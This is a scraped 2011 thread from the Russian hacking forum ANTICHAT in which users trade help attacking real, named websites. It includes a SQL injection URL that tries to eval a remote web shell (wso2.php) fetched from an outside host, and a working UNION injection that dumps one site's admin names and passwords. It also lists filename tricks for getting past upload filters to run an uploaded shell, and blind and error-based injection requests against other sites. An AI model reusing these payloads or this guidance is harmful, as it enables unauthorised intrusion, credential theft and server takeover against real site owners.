ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.05.2011, 18:15
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от AleksNEW
AleksNEW said:
Доброго времени суток. Вопрос следующий:
http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT - good
http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT' -bad
Это SQL ?
Нет.
http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=true
http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=false
|
|
|
14.05.2011, 18:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
7865
Репутация:
0
|
|
Файлы с тильдой на конце обычно являются файлами отката различных текстовых редакторов
|
|
|
|
15.05.2011, 00:21
|
|
Новичок
Регистрация: 16.05.2009
Сообщений: 12
Провел на форуме:
135091
Репутация:
2
|
|
Код:
Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(file_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630
Почему выскакивает такая штука, и как это обойти? Спасибо.
Вот запрос:
Код:
Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;
|
|
|
|
15.05.2011, 00:49
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от o'clock
o'clock said:
Код:
Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(file_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630
Почему выскакивает такая штука, и как это обойти? Спасибо.
Вот запрос:
Код:
Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;
А не проще ли было загуглить ф-цию \ ошибку?
Функция не может распарсить URL, потому что URL для нее невалиден.
|
|
|
|
15.05.2011, 04:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
261
Репутация:
1
|
|
Сообщение от o'clock
o'clock said:
Код:
Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(file_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630
Почему выскакивает такая штука, и как это обойти? Спасибо.
Вот запрос:
Код:
Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;
о0, хакер, ты не мог бы объяснить мне этот запрос?
union select ''
Во-первых, там нет прав, если ты планировал залить результаты выборки(читай твой зло-код эвала) селекта в файл. К томуже, твоя конструкция(без outfile, etc) ни к чему бы и не привела=/
Во-вторых, где ты там скулю увидел?
В-третьих, вот скуля с выводом, логин и пасс одмино.
Код:
Code:
http://www.sko-lotos.com/catalog.php?id=381'and(0)union select 1,concat_ws(0x3b, name, password),3,4,5,6,7 from users-- -
|
|
|
|
15.05.2011, 07:16
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
имеется сайт на котором можно залить файлы, я залил шелл под видом wso2.php.gif как теперь его переименовать и запустить?
|
|
|
|
15.05.2011, 11:25
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от foozzi
foozzi said:
имеется сайт на котором можно залить файлы, я залил шелл под видом wso2.php.gif как теперь его переименовать и запустить?
Если б всё было так просто. Если сервер nginx попробуй в URl набрать wso2.php.gif/.php
|
|
|
|
15.05.2011, 15:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
7865
Репутация:
0
|
|
2 foozzi
почитай вот это
Сообщение от None
file.PHP (file.PHP3 и т.д.)-- если в проверке по чёрному списку использовали регистрозависимые функции
file.jpg.php, file.gif.php (и вариации) -- при кривых регулярках
file.php.giflalala, file.php.lalalajpg -- кривые регулярки и mod_mime
file.php%00.gif -- опять-же криворукие программеры (тут несколько вариантов зависящих от реализации, например расширение отрубается при копировании, в функции copy() и мы получаем файл с расширением .php)
|
|
|
|
15.05.2011, 21:09
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Здесь через ошибку помогите вывести:
http://dahliasuppliers.com/noahsclassifieds/index.php?method=showhtmllist&list=classifiedscate gory&rollid=11'+order+by+26+--+&fromfromlist=classifiedscategory&fromfrommethod= showhtmllist&clearoff=1
|
|
|
|
15.05.2011, 22:09
|
|
Новичок
Регистрация: 16.05.2009
Сообщений: 12
Провел на форуме:
135091
Репутация:
2
|
|
На сайте блинд скуль, но почему-то я не могу даже узнать версию бд, подскажите пожалуйста, что сделать чтоб узнать?
Код:
Code:
http://www.trudprava.ru/ibp.php?id=1%20and%20substring%28@@version,1,1%29= 5
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
